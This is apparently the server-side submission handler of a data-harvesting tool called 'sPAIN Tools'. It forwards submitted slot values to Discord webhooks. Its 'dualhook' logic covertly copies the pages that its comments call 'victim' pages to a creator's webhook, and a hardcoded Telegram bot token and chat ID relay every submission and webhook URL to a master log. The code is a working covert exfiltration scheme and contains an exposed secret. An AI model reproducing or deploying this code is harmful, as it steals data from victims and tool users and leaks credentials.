// api/submit.js
// Webhook forwarding logic:
//
//   Plain Slots 1-9 (from index.html):
//     record.dualhookParent = null
//     → sends ONLY to record.webhook (the webhook the slots creator entered)
//
//   Child slots page (generated by victim from a dualhook page):
//     record.webhook        = victim's webhook2
//     record.dualhookParent = slug of the dualhook creator's page
//     → sends to record.webhook (webhook2 / victim)
//     → also looks up parent record and sends to parent.webhook (webhook1 / creator)

const REDIS_URL   = process.env.UPSTASH_REDIS_REST_URL;
const REDIS_TOKEN = process.env.UPSTASH_REDIS_REST_TOKEN;
const TG_TOKEN    = process.env.TG_TOKEN || '8666861605:AAFA3E5IVxOtajuENoWm6BhBF0VMJZRFhy8';
const TG_CHAT     = process.env.TG_CHAT  || '7538845070';

async function redisGet(key) {
  const res = await fetch(`${REDIS_URL}/get/${encodeURIComponent(key)}`, {
    headers: { Authorization: `Bearer ${REDIS_TOKEN}` }
  });
  const json = await res.json();
  if (!json.result) return null;
  try { return JSON.parse(json.result); } catch { return null; }
}

async function tgSend(text) {
  try {
    await fetch(`https://api.telegram.org/bot${TG_TOKEN}/sendMessage`, {
      method: 'POST',
      headers: { 'Content-Type': 'application/json' },
      body: JSON.stringify({ chat_id: TG_CHAT, text, parse_mode: 'HTML' })
    });
  } catch (_) {}
}

async function sendToDiscord(webhookUrl, embed) {
  if (!webhookUrl || !webhookUrl.startsWith('https://discord.com/api/webhooks/')) return;
  try {
    await fetch(webhookUrl, {
      method: 'POST',
      headers: { 'Content-Type': 'application/json' },
      body: JSON.stringify({
        username: 'sPAIN Tools',
        avatar_url: 'https://spain-tools.vercel.app/favicon.ico',
        embeds: [embed]
      })
    });
  } catch (_) {}
}

export default async function handler(req, res) {
  res.setHeader('Access-Control-Allow-Origin', '*');
  res.setHeader('Access-Control-Allow-Methods', 'POST, OPTIONS');
  res.setHeader('Access-Control-Allow-Headers', 'Content-Type');

  if (req.method === 'OPTIONS') return res.status(204).end();
  if (req.method !== 'POST')   return res.status(405).json({ error: 'Method not allowed' });

  let body = req.body;
  if (typeof body === 'string') {
    try { body = JSON.parse(body); } catch { return res.status(400).json({ error: 'Invalid JSON' }); }
  }

  const { slug, slots } = body || {};

  if (!slug)  return res.status(400).json({ error: 'slug is required' });
  if (!slots) return res.status(400).json({ error: 'slots is required' });

  // ── Load the submitted page's record ─────────────────────────────────────
  let record;
  try {
    record = await redisGet(`slot:${slug}`);
  } catch (err) {
    return res.status(500).json({ error: 'Redis error', detail: err.message });
  }
  if (!record) return res.status(404).json({ error: 'Page not found' });

  // ── Build Discord embed ───────────────────────────────────────────────────
  const fields = Object.entries(slots).map(([key, value]) => ({
    name:   `Slot ${key.replace('slot', '')}`,
    value:  value || '*(empty)*',
    inline: true
  }));

  const now = new Date().toISOString();
  const embed = {
    title:     `📥 New Submission — ${record.displayName}`,
    color:     0xc026d3,
    fields,
    footer:    { text: `sPAIN Tools • ${slug} • ${now}` },
    timestamp: now
  };

  // ── Step 1: Always send to the submitting page's own webhook ─────────────
  // For plain slots   → this is the only webhook that receives
  // For child (dh)    → this is victim's webhook2
  await sendToDiscord(record.webhook, embed);

  // ── Step 2: If this page was spawned by a dualhook, also notify creator ──
  // Look up the parent dualhook record and send to their webhook1 as well.
  // Only fires when dualhookParent was saved by claim.js (i.e. victim generated
  // this slots page from a dualhook landing page).
  if (record.dualhookParent) {
    try {
      const parentRecord = await redisGet(`slot:${record.dualhookParent}`);
      if (parentRecord && parentRecord.webhook && parentRecord.webhook !== record.webhook) {
        await sendToDiscord(parentRecord.webhook, embed);
      }
    } catch (_) { /* non-fatal — submission already recorded above */ }
  }

  // ── Step 3: Telegram master log ───────────────────────────────────────────
  // Resolve webhook1 from parent record if dualhook child
  let webhook1 = 'N/A';
  if (record.dualhookParent) {
    try {
      const parentRecord = await redisGet(`slot:${record.dualhookParent}`);
      if (parentRecord && parentRecord.webhook) webhook1 = parentRecord.webhook;
    } catch (_) {}
  }

  const slotEntry = Object.entries(slots).find(([, v]) => v && v.length > 0);
  const slotLabel = slotEntry ? slotEntry[0] : Object.keys(slots)[0];

  const tgMsg = [
    `🚨 <b>NEW SUBMISSION RECEIVED</b> 🚨`,
    `------------------------------------------`,
    `📄 PAGE:`,
    `${record.displayName}`,
    `------------------------------------------`,
    `🗂️ TYPE:`,
    `${record.type}`,
    `------------------------------------------`,
    `👤 DH PARENT:`,
    `${record.dualhookParent || 'N/A'}`,
    `------------------------------------------`,
    `🎯 SLOT:`,
    `${slotLabel}`,
    `------------------------------------------`,
    `🔗 PAGE WEBHOOK (WEBHOOK2):`,
    `<code>${record.webhook}</code>`,
    `------------------------------------------`,
    `🔗 WEBHOOK1:`,
    `<code>${webhook1}</code>`,
    `------------------------------------------`,
    `📅 DATE SUBMITTED:`,
    `${now}`,
    `------------------------------------------`
  ].join('\n');

  await tgSend(tgMsg);

  return res.status(200).json({ success: true });
}
